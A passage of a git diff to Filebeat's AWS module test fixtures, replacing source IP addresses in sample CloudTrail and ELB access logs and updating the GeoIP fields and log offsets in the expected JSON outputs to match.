-{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"205.251.233.182","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"}
+{"eventVersion":"1.04","userIdentity":{"type":"IAMUser","principalId":"EX_PRINCIPAL_ID","arn":"arn:aws:iam::123456789012:user/Alice","accountId":"123456789012","accessKeyId":"EXAMPLE_KEY_ID","userName":"Alice"},"eventTime":"2016-07-14T19:15:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-east-2","sourceIPAddress":"81.2.69.143","userAgent":"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22","errorCode":"TrailNotFoundException","errorMessage":"Unknown trail: myTrail2 for the user: 123456789012","requestParameters":{"name":"myTrail2"},"responseElements":null,"requestID":"5d40662a-49f7-11e6-97e4-dEXAMPLE","eventID":"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE","eventType":"AwsApiCall","recipientAccountId":"123456789012"}
 {"eventVersion":"1.05","userIdentity":{"type":"IAMUser","principalId":"EXAMPLE_ID","arn":"arn:aws:iam::0123456789012:user/Alice","accountId":"0123456789012","accessKeyId":"EXAMPLE_KEY","userName":"Alice","sessionContext":{"sessionIssuer":{},"webIdFederationData":{},"attributes":{"mfaAuthenticated":"true","creationDate":"2020-01-08T15:12:16Z"}},"invokedBy":"signin.amazonaws.com"},"eventTime":"2020-01-08T20:58:45Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","awsRegion":"us-west-2","sourceIPAddress":"127.0.0.1","userAgent":"signin.amazonaws.com","requestParameters":{"name":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","isMultiRegionTrail":true,"enableLogFileValidation":false,"kmsKeyId":""},"responseElements":{"name":"TEST-trail","s3BucketName":"test-cloudtrail-bucket","snsTopicName":"","snsTopicARN":"","includeGlobalServiceEvents":true,"isMultiRegionTrail":true,"trailARN":"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail","logFileValidationEnabled":false,"isOrganizationTrail":false},"requestID":"EXAMPLE-f3da-42d1-84f5-EXAMPLE","eventID":"EXAMPLE-b5e9-4846-8407-EXAMPLE","readOnly":false,"eventType":"AwsApiCall","recipientAccountId":"0123456789012"}
diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json
index 1d00ae0c1718..f8bb122015c1 100644
--- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json
+++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json
@@ -18,7 +18,7 @@
         "event.id": "b7d4398e-b2f0-4faa-9c76-e2EXAMPLE",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"205.251.233.182\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}",
+        "event.original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"81.2.69.143\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}",
         "event.outcome": "failure",
         "event.provider": "cloudtrail.amazonaws.com",
         "event.type": "info",
@@ -29,18 +29,16 @@
             "Alice"
         ],
         "service.type": "aws",
-        "source.address": "205.251.233.182",
-        "source.as.number": 16509,
-        "source.as.organization.name": "Amazon.com, Inc.",
-        "source.geo.city_name": "Boardman",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 45.8491,
-        "source.geo.location.lon": -119.7143,
-        "source.geo.region_iso_code": "US-OR",
-        "source.geo.region_name": "Oregon",
-        "source.ip": "205.251.233.182",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -94,7 +92,7 @@
         "event.type": "info",
         "fileset.name": "cloudtrail",
         "input.type": "log",
-        "log.offset": 766,
+        "log.offset": 762,
         "related.user": [
             "Alice"
         ],
diff --git a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log
index 5d754c4bbaaa..75e3aedd7184 100644
--- a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log
+++ b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log
@@ -1,11 +1,11 @@
-http 2019-10-11T15:01:12.376735Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56398 10.0.0.192:80 -1 -1 -1 460 - 125 0 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09932-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:06.657000Z "forward" "-" "-"
-http 2019-10-11T15:01:50.492440Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56488 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09954-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:40.491000Z "forward" "-" "-"
-http 2019-10-11T15:01:22.915238Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56416 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09938-d9c72660e247c36070017828" "-" "-" 0 2019-10-11T15:01:12.914000Z "forward" "-" "-"
-http 2019-10-11T15:01:35.190447Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56448 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09945-0eaa8050df7d96f84806ded0" "-" "-" 0 2019-10-11T15:01:25.189000Z "forward" "-" "-"
-http 2019-10-11T15:02:28.837316Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56602 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0997a-5add00b04bc8ae20ae96d9f0" "-" "-" 0 2019-10-11T15:02:18.836000Z "forward" "-" "-"
-http 2019-10-11T15:02:41.203002Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56638 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09987-cc391940b332434860dfa848" "-" "-" 0 2019-10-11T15:02:31.202000Z "forward" "-" "-"
-http 2019-10-11T15:03:49.331902Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37632 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da099cb-3d3b17eb2b75373f4c0c36c5" "-" "-" 0 2019-10-11T15:03:39.331000Z "forward" "-" "-"
-http 2019-10-11T15:55:09.308183Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37838 10.0.0.192:80 0.001 0.000 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5dd-4d9a423a0e9a782fe2f390af" "-" "-" 0 2019-10-11T15:55:09.307000Z "forward" "-" "-"
-http 2019-10-11T15:55:11.354283Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37850 10.0.1.107:80 0.001 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7d64cabe9955b4df9acc800a" "-" "-" 0 2019-10-11T15:55:11.352000Z "forward" "-" "-"
-http 2019-10-11T15:55:11.987940Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37856 10.0.0.192:80 0.000 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7c958e828ff43b63d0e0fac4" "-" "-" 0 2019-10-11T15:55:11.987000Z "forward" "-" "-"
+http 2019-10-11T15:01:12.376735Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56398 10.0.0.192:80 -1 -1 -1 460 - 125 0 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09932-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:06.657000Z "forward" "-" "-"
+http 2019-10-11T15:01:50.492440Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56488 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09954-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:40.491000Z "forward" "-" "-"
+http 2019-10-11T15:01:22.915238Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56416 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09938-d9c72660e247c36070017828" "-" "-" 0 2019-10-11T15:01:12.914000Z "forward" "-" "-"
+http 2019-10-11T15:01:35.190447Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56448 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09945-0eaa8050df7d96f84806ded0" "-" "-" 0 2019-10-11T15:01:25.189000Z "forward" "-" "-"
+http 2019-10-11T15:02:28.837316Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56602 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0997a-5add00b04bc8ae20ae96d9f0" "-" "-" 0 2019-10-11T15:02:18.836000Z "forward" "-" "-"
+http 2019-10-11T15:02:41.203002Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56638 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09987-cc391940b332434860dfa848" "-" "-" 0 2019-10-11T15:02:31.202000Z "forward" "-" "-"
+http 2019-10-11T15:03:49.331902Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37632 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da099cb-3d3b17eb2b75373f4c0c36c5" "-" "-" 0 2019-10-11T15:03:39.331000Z "forward" "-" "-"
+http 2019-10-11T15:55:09.308183Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37838 10.0.0.192:80 0.001 0.000 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5dd-4d9a423a0e9a782fe2f390af" "-" "-" 0 2019-10-11T15:55:09.307000Z "forward" "-" "-"
+http 2019-10-11T15:55:11.354283Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37850 10.0.1.107:80 0.001 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7d64cabe9955b4df9acc800a" "-" "-" 0 2019-10-11T15:55:11.352000Z "forward" "-" "-"
+http 2019-10-11T15:55:11.987940Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37856 10.0.0.192:80 0.000 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7c958e828ff43b63d0e0fac4" "-" "-" 0 2019-10-11T15:55:11.987000Z "forward" "-" "-"
 http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 "GET http://www.example.com:80/ HTTP/1.1" "curl/7.46.0" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 "Root=1-58337262-36d228ad5d99923122bbe354" "-" "-" 0 2018-07-02T22:22:48.364000Z "forward,redirect" "-" "-" "10.0.0.1:80" "200" "-" "-"
diff --git a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json
index 6b1533adb578..08d7d7380622 100644
--- a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json
+++ b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json
@@ -29,17 +29,15 @@
         "input.type": "log",
         "log.offset": 0,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "56398",
         "tags": [
             "forwarded"
@@ -83,19 +81,17 @@
         "http.response.status_code": 504,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 438,
+        "log.offset": 436,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "56488",
         "tags": [
             "forwarded"
@@ -139,19 +135,17 @@
         "http.response.status_code": 504,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 878,
+        "log.offset": 874,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "56416",
         "tags": [
             "forwarded"
@@ -195,19 +189,17 @@
         "http.response.status_code": 504,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1318,
+        "log.offset": 1312,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "56448",
         "tags": [
             "forwarded"
@@ -251,19 +243,17 @@
         "http.response.status_code": 504,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1758,
+        "log.offset": 1750,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "56602",
         "tags": [
             "forwarded"
@@ -307,19 +297,17 @@
         "http.response.status_code": 504,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 2198,
+        "log.offset": 2188,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "56638",
         "tags": [
             "forwarded"
@@ -363,19 +351,17 @@
         "http.response.status_code": 504,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 2638,
+        "log.offset": 2626,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "37632",
         "tags": [
             "forwarded"
@@ -423,19 +409,17 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 3078,
+        "log.offset": 3064,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "37838",
         "tags": [
             "forwarded"
@@ -483,19 +467,17 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 3529,
+        "log.offset": 3513,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "37850",
         "tags": [
             "forwarded"
@@ -543,19 +525,17 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 3980,
+        "log.offset": 3962,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "37856",
         "tags": [
             "forwarded"
@@ -610,7 +590,7 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 4431,
+        "log.offset": 4411,
         "service.type": "aws",
         "source.ip": "192.168.131.39",
         "source.port": "2817",
diff --git a/x-pack/filebeat/module/aws/elb/test/elb-http.log b/x-pack/filebeat/module/aws/elb/test/elb-http.log
index 8199e6cc0a3e..bed55efca409 100644
--- a/x-pack/filebeat/module/aws/elb/test/elb-http.log
+++ b/x-pack/filebeat/module/aws/elb/test/elb-http.log
@@ -1,6 +1,6 @@
-2019-10-14T12:00:20.694172Z filebeat-aws-elb-test 78.24.182.42:54106 10.0.1.185:80 0.000043 0.000785 0.000023 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - -
-2019-10-14T12:01:41.918996Z filebeat-aws-elb-test 31.135.65.4:54001 10.0.0.169:80 0.000041 0.00491 0.000027 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - -
-2019-10-14T12:01:49.543250Z filebeat-aws-elb-test 77.227.156.41:52406 10.0.1.185:80 0.000041 0.00079 0.000024 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - -
